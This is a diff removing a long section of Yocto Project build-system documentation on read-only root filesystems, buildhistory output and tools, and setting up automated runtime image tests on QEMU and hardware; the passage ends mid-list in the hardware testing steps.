-     SRCREV_pn-matchbox-desktop ?= "${AUTOREV}"
-     SRCREV_pn-matchbox-keyboard ?= "${AUTOREV}"
-     SRCREV_pn-matchbox-panel-2 ?= "${AUTOREV}"
-     SRCREV_pn-matchbox-themes-extra ?= "${AUTOREV}"
-     SRCREV_pn-matchbox-terminal ?= "${AUTOREV}"
-     SRCREV_pn-matchbox-wm ?= "${AUTOREV}"
-     SRCREV_pn-settings-daemon ?= "${AUTOREV}"
-     SRCREV_pn-screenshot ?= "${AUTOREV}"
-          .
-          .
-          .
-            </literallayout>
-            These lines allow you to experiment with building a
-            distribution that tracks the latest development source
-            for numerous packages.
-            <note><title>Caution</title>
-                The <filename>poky-bleeding</filename> distribution
-                is not tested on a regular basis.
-                Keep this in mind if you use it.
-            </note>
-        </para>
-    </section>
-
-    <section id='creating-a-read-only-root-filesystem'>
-        <title>Creating a Read-Only Root Filesystem</title>
-
-        <para>
-            Suppose, for security reasons, you need to disable
-            your target device's root filesystem's write permissions
-            (i.e. you need a read-only root filesystem).
-            Or, perhaps you are running the device's operating system
-            from a read-only storage device.
-            For either case, you can customize your image for
-            that behavior.
-        </para>
-
-        <note>
-            Supporting a read-only root filesystem requires that the system and
-            applications do not try to write to the root filesystem.
-            You must configure all parts of the target system to write
-            elsewhere, or to gracefully fail in the event of attempting to
-            write to the root filesystem.
-        </note>
-
-        <section id='creating-the-root-filesystem'>
-            <title>Creating the Root Filesystem</title>
-
-            <para>
-                To create the read-only root filesystem, simply add the
-                "read-only-rootfs" feature to your image, normally in one of two ways.
-                The first way is to add the "read-only-rootfs" image feature
-                in the image's recipe file via the
-                <filename>IMAGE_FEATURES</filename> variable:
-                <literallayout class='monospaced'>
-     IMAGE_FEATURES += "read-only-rootfs"
-                </literallayout>
-                As an alternative, you can add the same feature from within your
-                build directory's <filename>local.conf</filename> file with the
-                associated <filename>EXTRA_IMAGE_FEATURES</filename> variable, as in:
-                <literallayout class='monospaced'>
-     EXTRA_IMAGE_FEATURES = "read-only-rootfs"
-                </literallayout>
-            </para>
-
-            <para>
-                For more information on how to use these variables, see the
-                "<link linkend='usingpoky-extend-customimage-imagefeatures'>Customizing Images Using Custom <filename>IMAGE_FEATURES</filename> and <filename>EXTRA_IMAGE_FEATURES</filename></link>"
-                section.
-                For information on the variables, see
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></ulink>
-                and <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_IMAGE_FEATURES'><filename>EXTRA_IMAGE_FEATURES</filename></ulink>.
-            </para>
-        </section>
-
-        <section id='post-installation-scripts'>
-            <title>Post-Installation Scripts</title>
-
-            <para>
-                It is very important that you make sure all
-                post-Installation (<filename>pkg_postinst</filename>) scripts
-                for packages that are installed into the image can be run
-                at the time when the root filesystem is created during the
-                build on the host system.
-                These scripts cannot attempt to run during first-boot on the
-                target device.
-                With the "read-only-rootfs" feature enabled,
-                the build system checks during root filesystem creation to make
-                sure all post-installation scripts succeed.
-                If any of these scripts still need to be run after the root
-                filesystem is created, the build immediately fails.
-                These build-time checks ensure that the build fails
-                rather than the target device fails later during its
-                initial boot operation.
-            </para>
-
-            <para>
-                Most of the common post-installation scripts generated by the
-                build system for the out-of-the-box Yocto Project are engineered
-                so that they can run during root filesystem creation
-                (e.g. post-installation scripts for caching fonts).
-                However, if you create and add custom scripts, you need
-                to be sure they can be run during this file system creation.
-            </para>
-
-            <para>
-                Here are some common problems that prevent
-                post-installation scripts from running during root filesystem
-                creation:
-                <itemizedlist>
-                    <listitem><para>
-                        <emphasis>Not using $D in front of absolute
-                        paths:</emphasis>
-                        The build system defines
-                        <filename>$</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-D'><filename>D</filename></ulink>
-                        when the root filesystem is created.
-                        Furthermore, <filename>$D</filename> is blank when the
-                        script is run on the target device.
-                        This implies two purposes for <filename>$D</filename>:
-                        ensuring paths are valid in both the host and target
-                        environments, and checking to determine which
-                        environment is being used as a method for taking
-                        appropriate actions.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Attempting to run processes that are
-                        specific to or dependent on the target
-                        architecture:</emphasis>
-                        You can work around these attempts by using native
-                        tools, which run on the host system,
-                        to accomplish the same tasks, or
-                        by alternatively running the processes under QEMU,
-                        which has the <filename>qemu_run_binary</filename>
-                        function.
-                        For more information, see the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-qemu'><filename>qemu</filename></ulink>
-                        class.</para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='areas-with-write-access'>
-            <title>Areas With Write Access</title>
-
-            <para>
-                With the "read-only-rootfs" feature enabled,
-                any attempt by the target to write to the root filesystem at
-                runtime fails.
-                Consequently, you must make sure that you configure processes
-                and applications that attempt these types of writes do so
-                to directories with write access (e.g.
-                <filename>/tmp</filename> or <filename>/var/run</filename>).
-            </para>
-        </section>
-    </section>
-
-
-
-
-    <section id='maintaining-build-output-quality'>
-        <title>Maintaining Build Output Quality</title>
-
-        <para>
-            Many factors can influence the quality of a build.
-            For example, if you upgrade a recipe to use a new version of an
-            upstream software package or you experiment with some new
-            configuration options, subtle changes can occur that you might
-            not detect until later.
-            Consider the case where your recipe is using a newer version of
-            an upstream package.
-            In this case, a new version of a piece of software might
-            introduce an optional dependency on another library, which is
-            auto-detected.
-            If that library has already been built when the software is
-            building, the software will link to the built library and that
-            library will be pulled into your image along with the new
-            software even if you did not want the library.
-        </para>
-
-        <para>
-            The
-            <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-buildhistory'><filename>buildhistory</filename></ulink>
-            class exists to help you maintain the quality of your build
-            output.
-            You can use the class to highlight unexpected and possibly
-            unwanted changes in the build output.
-            When you enable build history, it records information about the
-            contents of each package and image and then commits that
-            information to a local Git repository where you can examine
-            the information.
-        </para>
-
-        <para>
-            The remainder of this section describes the following:
-            <itemizedlist>
-               <listitem><para>
-                   How you can enable and disable build history
-                   </para></listitem>
-               <listitem><para>
-                   How to understand what the build history contains
-                   </para></listitem>
-               <listitem><para>
-                   How to limit the information used for build history
-                   </para></listitem>
-               <listitem><para>
-                   How to examine the build history from both a
-                   command-line and web interface
-                   </para></listitem>
-           </itemizedlist>
-        </para>
-
-        <section id='enabling-and-disabling-build-history'>
-            <title>Enabling and Disabling Build History</title>
-
-            <para>
-                Build history is disabled by default.
-                To enable it, add the following <filename>INHERIT</filename>
-                statement and set the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-BUILDHISTORY_COMMIT'><filename>BUILDHISTORY_COMMIT</filename></ulink>
-                variable to "1" at the end of your
-                <filename>conf/local.conf</filename> file found in the
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>:
-                <literallayout class='monospaced'>
-     INHERIT += "buildhistory"
-     BUILDHISTORY_COMMIT = "1"
-                </literallayout>
-                Enabling build history as previously described causes the
-                OpenEmbedded build system to collect build output information
-                and commit it as a single commit to a local
-                <ulink url='&YOCTO_DOCS_OM_URL;#git'>Git</ulink>
-                repository.
-                <note>
-                    Enabling build history increases your build times slightly,
-                    particularly for images, and increases the amount of disk
-                    space used during the build.
-                </note>
-            </para>
-
-            <para>
-                You can disable build history by removing the previous
-                statements from your <filename>conf/local.conf</filename>
-                file.
-            </para>
-        </section>
-
-        <section id='understanding-what-the-build-history-contains'>
-            <title>Understanding What the Build History Contains</title>
-
-            <para>
-                Build history information is kept in
-                <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-TOPDIR'><filename>TOPDIR</filename></ulink><filename>}/buildhistory</filename>
-                in the Build Directory as defined by the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-BUILDHISTORY_DIR'><filename>BUILDHISTORY_DIR</filename></ulink>
-                variable.
-                The following is an example abbreviated listing:
-                <imagedata fileref="figures/buildhistory.png" align="center" width="6in" depth="4in" />
-            </para>
-
-            <para>
-                At the top level, a <filename>metadata-revs</filename>
-                file exists that lists the revisions of the repositories for
-                the enabled layers when the build was produced.
-                The rest of the data splits into separate
-                <filename>packages</filename>, <filename>images</filename>
-                and <filename>sdk</filename> directories, the contents of
-                which are described as follows.
-            </para>
-
-            <section id='build-history-package-information'>
-                <title>Build History Package Information</title>
-
-                <para>
-                    The history for each package contains a text file that has
-                    name-value pairs with information about the package.
-                    For example,
-                    <filename>buildhistory/packages/i586-poky-linux/busybox/busybox/latest</filename>
-                    contains the following:
-                    <literallayout class='monospaced'>
-     PV = 1.22.1
-     PR = r32
-     RPROVIDES =
-     RDEPENDS = glibc (>= 2.20) update-alternatives-opkg
-     RRECOMMENDS = busybox-syslog busybox-udhcpc update-rc.d
-     PKGSIZE = 540168
-     FILES = /usr/bin/* /usr/sbin/* /usr/lib/busybox/* /usr/lib/lib*.so.* \
-        /etc /com /var /bin/* /sbin/* /lib/*.so.* /lib/udev/rules.d \
-        /usr/lib/udev/rules.d /usr/share/busybox /usr/lib/busybox/* \
-        /usr/share/pixmaps /usr/share/applications /usr/share/idl \
-        /usr/share/omf /usr/share/sounds /usr/lib/bonobo/servers
-     FILELIST = /bin/busybox /bin/busybox.nosuid /bin/busybox.suid /bin/sh \
-        /etc/busybox.links.nosuid /etc/busybox.links.suid
-                    </literallayout>
-                    Most of these name-value pairs correspond to variables
-                    used to produce the package.
-                    The exceptions are <filename>FILELIST</filename>, which
-                    is the actual list of files in the package, and
-                    <filename>PKGSIZE</filename>, which is the total size of
-                    files in the package in bytes.
-                </para>
-
-                <para>
-                    A file also exists that corresponds to the recipe from
-                    which the package came (e.g.
-                    <filename>buildhistory/packages/i586-poky-linux/busybox/latest</filename>):
-                    <literallayout class='monospaced'>
-     PV = 1.22.1
-     PR = r32
-     DEPENDS = initscripts kern-tools-native update-rc.d-native \
-        virtual/i586-poky-linux-compilerlibs virtual/i586-poky-linux-gcc \
-        virtual/libc virtual/update-alternatives
-     PACKAGES = busybox-ptest busybox-httpd busybox-udhcpd busybox-udhcpc \
-        busybox-syslog busybox-mdev busybox-hwclock busybox-dbg \
-        busybox-staticdev busybox-dev busybox-doc busybox-locale busybox
-                    </literallayout>
-                </para>
-
-                <para>
-                    Finally, for those recipes fetched from a version control
-                    system (e.g., Git), a file exists that lists source
-                    revisions that are specified in the recipe and lists
-                    the actual revisions used during the build.
-                    Listed and actual revisions might differ when
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCREV'><filename>SRCREV</filename></ulink>
-                    is set to
-                    ${<ulink url='&YOCTO_DOCS_REF_URL;#var-AUTOREV'><filename>AUTOREV</filename></ulink>}.
-                    Here is an example assuming
-                    <filename>buildhistory/packages/qemux86-poky-linux/linux-yocto/latest_srcrev</filename>):
-                    <literallayout class='monospaced'>
-     # SRCREV_machine = "38cd560d5022ed2dbd1ab0dca9642e47c98a0aa1"
-     SRCREV_machine = "38cd560d5022ed2dbd1ab0dca9642e47c98a0aa1"
-     # SRCREV_meta = "a227f20eff056e511d504b2e490f3774ab260d6f"
-     SRCREV_meta = "a227f20eff056e511d504b2e490f3774ab260d6f"
-                    </literallayout>
-                    You can use the
-                    <filename>buildhistory-collect-srcrevs</filename>
-                    command with the <filename>-a</filename> option to
-                    collect the stored <filename>SRCREV</filename> values
-                    from build history and report them in a format suitable for
-                    use in global configuration (e.g.,
-                    <filename>local.conf</filename> or a distro include file)
-                    to override floating <filename>AUTOREV</filename> values
-                    to a fixed set of revisions.
-                    Here is some example output from this command:
-                    <literallayout class='monospaced'>
-     $ buildhistory-collect-srcrevs -a
-     # i586-poky-linux
-     SRCREV_pn-glibc = "b8079dd0d360648e4e8de48656c5c38972621072"
-     SRCREV_pn-glibc-initial = "b8079dd0d360648e4e8de48656c5c38972621072"
-     SRCREV_pn-opkg-utils = "53274f087565fd45d8452c5367997ba6a682a37a"
-     SRCREV_pn-kmod = "fd56638aed3fe147015bfa10ed4a5f7491303cb4"
-     # x86_64-linux
-     SRCREV_pn-gtk-doc-stub-native = "1dea266593edb766d6d898c79451ef193eb17cfa"
-     SRCREV_pn-dtc-native = "65cc4d2748a2c2e6f27f1cf39e07a5dbabd80ebf"
-     SRCREV_pn-update-rc.d-native = "eca680ddf28d024954895f59a241a622dd575c11"
-     SRCREV_glibc_pn-cross-localedef-native = "b8079dd0d360648e4e8de48656c5c38972621072"
-     SRCREV_localedef_pn-cross-localedef-native = "c833367348d39dad7ba018990bfdaffaec8e9ed3"
-     SRCREV_pn-prelink-native = "faa069deec99bf61418d0bab831c83d7c1b797ca"
-     SRCREV_pn-opkg-utils-native = "53274f087565fd45d8452c5367997ba6a682a37a"
-     SRCREV_pn-kern-tools-native = "23345b8846fe4bd167efdf1bd8a1224b2ba9a5ff"
-     SRCREV_pn-kmod-native = "fd56638aed3fe147015bfa10ed4a5f7491303cb4"
-     # qemux86-poky-linux
-     SRCREV_machine_pn-linux-yocto = "38cd560d5022ed2dbd1ab0dca9642e47c98a0aa1"
-     SRCREV_meta_pn-linux-yocto = "a227f20eff056e511d504b2e490f3774ab260d6f"
-     # all-poky-linux
-     SRCREV_pn-update-rc.d = "eca680ddf28d024954895f59a241a622dd575c11"
-                    </literallayout>
-                    <note>
-                        Here are some notes on using the
-                        <filename>buildhistory-collect-srcrevs</filename>
-                        command:
-                        <itemizedlist>
-                            <listitem><para>
-                                By default, only values where the
-                                <filename>SRCREV</filename> was not hardcoded
-                                (usually when <filename>AUTOREV</filename>
-                                is used) are reported.
-                                Use the <filename>-a</filename> option to
-                                see all <filename>SRCREV</filename> values.
-                                </para></listitem>
-                            <listitem><para>
-                                The output statements might not have any effect
-                                if overrides are applied elsewhere in the
-                                build system configuration.
-                                Use the <filename>-f</filename> option to add
-                                the <filename>forcevariable</filename> override
-                                to each output line if you need to work around
-                                this restriction.
-                                </para></listitem>
-                            <listitem><para>
-                                The script does apply special handling when
-                                building for multiple machines.
-                                However, the script does place a comment before
-                                each set of values that specifies which
-                                triplet to which they belong as previously
-                                shown (e.g.,
-                                <filename>i586-poky-linux</filename>).
-                                </para></listitem>
-                        </itemizedlist>
-                    </note>
-                </para>
-            </section>
-
-            <section id='build-history-image-information'>
-                <title>Build History Image Information</title>
-
-                <para>
-                    The files produced for each image are as follows:
-                    <itemizedlist>
-                        <listitem><para>
-                            <filename>image-files:</filename>
-                            A directory containing selected files from the root
-                            filesystem.
-                            The files are defined by
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-BUILDHISTORY_IMAGE_FILES'><filename>BUILDHISTORY_IMAGE_FILES</filename></ulink>.
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>build-id.txt:</filename>
-                            Human-readable information about the build
-                            configuration and metadata source revisions.
-                            This file contains the full build header as printed
-                            by BitBake.
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>*.dot:</filename>
-                            Dependency graphs for the image that are
-                            compatible with <filename>graphviz</filename>.
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>files-in-image.txt:</filename>
- 	                        A list of files in the image with permissions,
-                            owner, group, size, and symlink information.
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>image-info.txt:</filename>
-                            A text file containing name-value pairs with
-                            information about the image.
-                            See the following listing example for more
-                            information.
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>installed-package-names.txt:</filename>
-                            A list of installed packages by name only.
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>installed-package-sizes.txt:</filename>
-                            A list of installed packages ordered by size.
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>installed-packages.txt:</filename>
-                            A list of installed packages with full package
-                            filenames.
-                            </para></listitem>
-                    </itemizedlist>
-                    <note>
-                        Installed package information is able to be gathered
-                        and produced even if package management is disabled
-                        for the final image.
-                    </note>
-                </para>
-
-                <para>
-                    Here is an example of <filename>image-info.txt</filename>:
-                    <literallayout class='monospaced'>
-     DISTRO = poky
-     DISTRO_VERSION = 1.7
-     USER_CLASSES = buildstats image-mklibs image-prelink
-     IMAGE_CLASSES = image_types
-     IMAGE_FEATURES = debug-tweaks
-     IMAGE_LINGUAS =
-     IMAGE_INSTALL = packagegroup-core-boot run-postinsts
-     BAD_RECOMMENDATIONS =
-     NO_RECOMMENDATIONS =
-     PACKAGE_EXCLUDE =
-     ROOTFS_POSTPROCESS_COMMAND = write_package_manifest; license_create_manifest; \
-        write_image_manifest ; buildhistory_list_installed_image ; \
-        buildhistory_get_image_installed ; ssh_allow_empty_password;  \
-        postinst_enable_logging; rootfs_update_timestamp ; ssh_disable_dns_lookup ;
-     IMAGE_POSTPROCESS_COMMAND =   buildhistory_get_imageinfo ;
-     IMAGESIZE = 6900
-                    </literallayout>
-                    Other than <filename>IMAGESIZE</filename>, which is the
-                    total size of the files in the image in Kbytes, the
-                    name-value pairs are variables that may have influenced the
-                    content of the image.
-                    This information is often useful when you are trying to
-                    determine why a change in the package or file
-                    listings has occurred.
-                </para>
-            </section>
-
-            <section id='using-build-history-to-gather-image-information-only'>
-                <title>Using Build History to Gather Image Information Only</title>
-
-                <para>
-                    As you can see, build history produces image information,
-                    including dependency graphs, so you can see why something
-                    was pulled into the image.
-                    If you are just interested in this information and not
-                    interested in collecting specific package or SDK
-                    information, you can enable writing only image information
-                    without any history by adding the following to your
-                    <filename>conf/local.conf</filename> file found in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>:
-                    <literallayout class='monospaced'>
-     INHERIT += "buildhistory"
-     BUILDHISTORY_COMMIT = "0"
-     BUILDHISTORY_FEATURES = "image"
-                    </literallayout>
-                    Here, you set the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-BUILDHISTORY_FEATURES'><filename>BUILDHISTORY_FEATURES</filename></ulink>
-                    variable to use the image feature only.
-                </para>
-            </section>
-
-            <section id='build-history-sdk-information'>
-                <title>Build History SDK Information</title>
-
-                <para>
-                    Build history collects similar information on the contents
-                    of SDKs
-                    (e.g. <filename>bitbake -c populate_sdk imagename</filename>)
-                    as compared to information it collects for images.
-                    Furthermore, this information differs depending on whether
-                    an extensible or standard SDK is being produced.
-                </para>
-
-                <para>
-                    The following list shows the files produced for SDKs:
-                    <itemizedlist>
-                        <listitem><para>
-                            <filename>files-in-sdk.txt:</filename>
-                            A list of files in the SDK with permissions,
-                            owner, group, size, and symlink information.
-                            This list includes both the host and target parts
-                            of the SDK.
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>sdk-info.txt:</filename>
-                            A text file containing name-value pairs with
-                            information about the SDK.
-                            See the following listing example for more
-                            information.
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>sstate-task-sizes.txt:</filename>
-                            A text file containing name-value pairs with
-                            information about task group sizes
-                            (e.g. <filename>do_populate_sysroot</filename>
-                            tasks have a total size).
-                            The <filename>sstate-task-sizes.txt</filename> file
-                            exists only when an extensible SDK is created.
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>sstate-package-sizes.txt:</filename>
-                            A text file containing name-value pairs with
-                            information for the shared-state packages and
-                            sizes in the SDK.
-                            The <filename>sstate-package-sizes.txt</filename>
-                            file exists only when an extensible SDK is created.
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>sdk-files:</filename>
-                            A folder that contains copies of the files
-                            mentioned in
-                            <filename>BUILDHISTORY_SDK_FILES</filename> if the
-                            files are present in the output.
-                            Additionally, the default value of
-                            <filename>BUILDHISTORY_SDK_FILES</filename> is
-                            specific to the extensible SDK although you can
-                            set it differently if you would like to pull in
-                            specific files from the standard SDK.</para>
-
-                            <para>The default files are
-                            <filename>conf/local.conf</filename>,
-                            <filename>conf/bblayers.conf</filename>,
-                            <filename>conf/auto.conf</filename>,
-                            <filename>conf/locked-sigs.inc</filename>, and
-                            <filename>conf/devtool.conf</filename>.
-                            Thus, for an extensible SDK, these files get
-                            copied into the <filename>sdk-files</filename>
-                            directory.
-                            </para></listitem>
-                        <listitem><para>
-                            The following information appears under
-                            each of the <filename>host</filename>
-                            and <filename>target</filename> directories
-                            for the portions of the SDK that run on the host
-                            and on the target, respectively:
-                            <note>
-                                The following files for the most part are empty
-                                when producing an extensible SDK because this
-                                type of SDK is not constructed from packages
-                                as is the standard SDK.
-                            </note>
-                            <itemizedlist>
-                                <listitem><para>
-                                    <filename>depends.dot:</filename>
-                                    Dependency graph for the SDK that is
-                                    compatible with
-                                    <filename>graphviz</filename>.
-                                    </para></listitem>
-                                <listitem><para>
-                                    <filename>installed-package-names.txt:</filename>
-                                    A list of installed packages by name only.
-                                    </para></listitem>
-                                <listitem><para>
-                                    <filename>installed-package-sizes.txt:</filename>
-                                    A list of installed packages ordered by size.
-                                    </para></listitem>
-                                <listitem><para>
-                                    <filename>installed-packages.txt:</filename>
-                                    A list of installed packages with full
-                                    package filenames.
-                                    </para></listitem>
-                                </itemizedlist>
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-
-                <para>
-                    Here is an example of <filename>sdk-info.txt</filename>:
-                    <literallayout class='monospaced'>
-     DISTRO = poky
-     DISTRO_VERSION = 1.3+snapshot-20130327
-     SDK_NAME = poky-glibc-i686-arm
-     SDK_VERSION = 1.3+snapshot
-     SDKMACHINE =
-     SDKIMAGE_FEATURES = dev-pkgs dbg-pkgs
-     BAD_RECOMMENDATIONS =
-     SDKSIZE = 352712
-                    </literallayout>
-                    Other than <filename>SDKSIZE</filename>, which is the
-                    total size of the files in the SDK in Kbytes, the
-                    name-value pairs are variables that might have influenced
-                    the content of the SDK.
-                    This information is often useful when you are trying to
-                    determine why a change in the package or file listings
-                    has occurred.
-                </para>
-            </section>
-
-            <section id='examining-build-history-information'>
-                <title>Examining Build History Information</title>
-
-                <para>
-                    You can examine build history output from the command
-                    line or from a web interface.
-                </para>
-
-                <para>
-                    To see any changes that have occurred (assuming you have
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-BUILDHISTORY_COMMIT'><filename>BUILDHISTORY_COMMIT</filename></ulink><filename>&nbsp;= "1"</filename>),
-                    you can simply use any Git command that allows you to
-                    view the history of a repository.
-                    Here is one method:
-                    <literallayout class='monospaced'>
-      $ git log -p
-                    </literallayout>
-                    You need to realize, however, that this method does show
-                    changes that are not significant (e.g. a package's size
-                    changing by a few bytes).
-                </para>
-
-                <para>
-                    A command-line tool called
-                    <filename>buildhistory-diff</filename> does exist, though,
-                    that queries the Git repository and prints just the
-                    differences that might be significant in human-readable
-                    form.
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     $ ~/poky/poky/scripts/buildhistory-diff . HEAD^
-     Changes to images/qemux86_64/glibc/core-image-minimal (files-in-image.txt):
-        /etc/anotherpkg.conf was added
-        /sbin/anotherpkg was added
-        * (installed-package-names.txt):
-        *   anotherpkg was added
-     Changes to images/qemux86_64/glibc/core-image-minimal (installed-package-names.txt):
-        anotherpkg was added
-     packages/qemux86_64-poky-linux/v86d: PACKAGES: added "v86d-extras"
-        * PR changed from "r0" to "r1"
-        * PV changed from "0.1.10" to "0.1.12"
-     packages/qemux86_64-poky-linux/v86d/v86d: PKGSIZE changed from 110579 to 144381 (+30%)
-        * PR changed from "r0" to "r1"
-        * PV changed from "0.1.10" to "0.1.12"
-                    </literallayout>
-                    <note>
-                        The <filename>buildhistory-diff</filename> tool
-                        requires the <filename>GitPython</filename> package.
-                        Be sure to install it using Pip3 as follows:
-                        <literallayout class='monospaced'>
-   $ pip3 install GitPython --user
-                        </literallayout>
-                        Alternatively, you can install
-                        <filename>python3-git</filename> using the appropriate
-                        distribution package manager (e.g.
-                        <filename>apt-get</filename>, <filename>dnf</filename>,
-                        or <filename>zipper</filename>).
-                    </note>
-                </para>
-
-                <para>
-                    To see changes to the build history using a web interface,
-                    follow the instruction in the <filename>README</filename>
-                    file here.
-                    <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/buildhistory-web/'></ulink>.
-                </para>
-
-                <para>
-                    Here is a sample screenshot of the interface:
-                    <imagedata fileref="figures/buildhistory-web.png" align="center" scalefit="1" width="130%" contentdepth="130%" />
-                </para>
-            </section>
-        </section>
-    </section>
-
-    <section id="performing-automated-runtime-testing">
-        <title>Performing Automated Runtime Testing</title>
-
-        <para>
-            The OpenEmbedded build system makes available a series of automated
-            tests for images to verify runtime functionality.
-            You can run these tests on either QEMU or actual target hardware.
-            Tests are written in Python making use of the
-            <filename>unittest</filename> module, and the majority of them
-            run commands on the target system over SSH.
-            This section describes how you set up the environment to use these
-            tests, run available tests, and write and add your own tests.
-        </para>
-
-        <para>
-            For information on the test and QA infrastructure available
-            within the Yocto Project, see the
-            "<ulink url='&YOCTO_DOCS_REF_URL;#testing-and-quality-assurance'>Testing and Quality Assurance</ulink>"
-            section in the Yocto Project Reference Manual.
-        </para>
-
-        <section id='enabling-tests'>
-            <title>Enabling Tests</title>
-
-            <para>
-                Depending on whether you are planning to run tests using
-                QEMU or on the hardware, you have to take
-                different steps to enable the tests.
-                See the following subsections for information on how to
-                enable both types of tests.
-            </para>
-
-            <section id='qemu-image-enabling-tests'>
-                <title>Enabling Runtime Tests on QEMU</title>
-
-                <para>
-                    In order to run tests, you need to do the following:
-                    <itemizedlist>
-                        <listitem><para><emphasis>Set up to avoid interaction
-                            with <filename>sudo</filename> for networking:</emphasis>
-                            To accomplish this, you must do one of the
-                            following:
-                            <itemizedlist>
-                                <listitem><para>Add
-                                    <filename>NOPASSWD</filename> for your user
-                                    in <filename>/etc/sudoers</filename> either for
-                                    all commands or just for
-                                    <filename>runqemu-ifup</filename>.
-                                    You must provide the full path as that can
-                                    change if you are using multiple clones of the
-                                    source repository.
-                                    <note>
-                                        On some distributions, you also need to
-                                        comment out "Defaults requiretty" in
-                                        <filename>/etc/sudoers</filename>.
-                                    </note></para></listitem>
-                                <listitem><para>Manually configure a tap interface
-                                    for your system.</para></listitem>
-                                <listitem><para>Run as root the script in
-                                    <filename>scripts/runqemu-gen-tapdevs</filename>,
-                                    which should generate a list of tap devices.
-                                    This is the option typically chosen for
-                                    Autobuilder-type environments.
-                                    <note><title>Notes</title>
-                                        <itemizedlist>
-                                            <listitem><para>
-                                                Be sure to use an absolute path
-                                                when calling this script
-                                                with sudo.
-                                                </para></listitem>
-                                            <listitem><para>
-                                                The package recipe
-                                                <filename>qemu-helper-native</filename>
-                                                is required to run this script.
-                                                Build the package using the
-                                                following command:
-                                                <literallayout class='monospaced'>
-     $ bitbake qemu-helper-native
-                                                </literallayout>
-                                                </para></listitem>
-                                        </itemizedlist>
-                                    </note>
-                                    </para></listitem>
-                            </itemizedlist></para></listitem>
-                        <listitem><para><emphasis>Set the
-                            <filename>DISPLAY</filename> variable:</emphasis>
-                            You need to set this variable so that you have an X
-                            server available (e.g. start
-                            <filename>vncserver</filename> for a headless machine).
-                            </para></listitem>
-                        <listitem><para><emphasis>Be sure your host's firewall
-                            accepts incoming connections from
-                            192.168.7.0/24:</emphasis>
-                            Some of the tests (in particular DNF tests) start
-                            an HTTP server on a random high number port,
-                            which is used to serve files to the target.
-                            The DNF module serves
-                            <filename>${WORKDIR}/oe-rootfs-repo</filename>
-                            so it can run DNF channel commands.
-                            That means your host's firewall
-                            must accept incoming connections from 192.168.7.0/24,
-                            which is the default IP range used for tap devices
-                            by <filename>runqemu</filename>.</para></listitem>
-                        <listitem><para><emphasis>Be sure your host has the
-                            correct packages installed:</emphasis>
-                            Depending your host's distribution, you need
-                            to have the following packages installed:
-                            <itemizedlist>
-                                <listitem><para>Ubuntu and Debian:
-                                    <filename>sysstat</filename> and
-                                    <filename>iproute2</filename>
-                                    </para></listitem>
-                                <listitem><para>OpenSUSE:
-                                    <filename>sysstat</filename> and
-                                    <filename>iproute2</filename>
-                                    </para></listitem>
-                                <listitem><para>Fedora:
-                                    <filename>sysstat</filename> and
-                                    <filename>iproute</filename>
-                                    </para></listitem>
-                                <listitem><para>CentOS:
-                                    <filename>sysstat</filename> and
-                                    <filename>iproute</filename>
-                                    </para></listitem>
-                            </itemizedlist>
-                        </para></listitem>
-                    </itemizedlist>
-                </para>
-
-                <para>
-                    Once you start running the tests, the following happens:
-                    <orderedlist>
-                        <listitem><para>A copy of the root filesystem is written
-                            to <filename>${WORKDIR}/testimage</filename>.
-                            </para></listitem>
-                        <listitem><para>The image is booted under QEMU using the
-                            standard <filename>runqemu</filename> script.
-                            </para></listitem>
-                        <listitem><para>A default timeout of 500 seconds occurs
-                            to allow for the boot process to reach the login prompt.
-                            You can change the timeout period by setting
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-TEST_QEMUBOOT_TIMEOUT'><filename>TEST_QEMUBOOT_TIMEOUT</filename></ulink>
-                            in the <filename>local.conf</filename> file.
-                            </para></listitem>
-                        <listitem><para>Once the boot process is reached and the
-                            login prompt appears, the tests run.
-                            The full boot log is written to
-                            <filename>${WORKDIR}/testimage/qemu_boot_log</filename>.
-                            </para></listitem>
-                        <listitem><para>Each test module loads in the order found
-                            in <filename>TEST_SUITES</filename>.
-                            You can find the full output of the commands run over
-                            SSH in
-                            <filename>${WORKDIR}/testimgage/ssh_target_log</filename>.
-                            </para></listitem>
-                        <listitem><para>If no failures occur, the task running the
-                            tests ends successfully.
-                            You can find the output from the
-                            <filename>unittest</filename> in the task log at
-                            <filename>${WORKDIR}/temp/log.do_testimage</filename>.
-                            </para></listitem>
-                    </orderedlist>
-                </para>
-            </section>
-
-            <section id='hardware-image-enabling-tests'>
-                <title>Enabling Runtime Tests on Hardware</title>
-
-                <para>
-                    The OpenEmbedded build system can run tests on real
-                    hardware, and for certain devices it can also deploy
-                    the image to be tested onto the device beforehand.
-                </para>
-
-                <para>
-                    For automated deployment, a "master image" is installed
-                    onto the hardware once as part of setup.
-                    Then, each time tests are to be run, the following
-                    occurs:
-                    <orderedlist>
-                        <listitem><para>The master image is booted into and
-                            used to write the image to be tested to
-                            a second partition.
-                            </para></listitem>
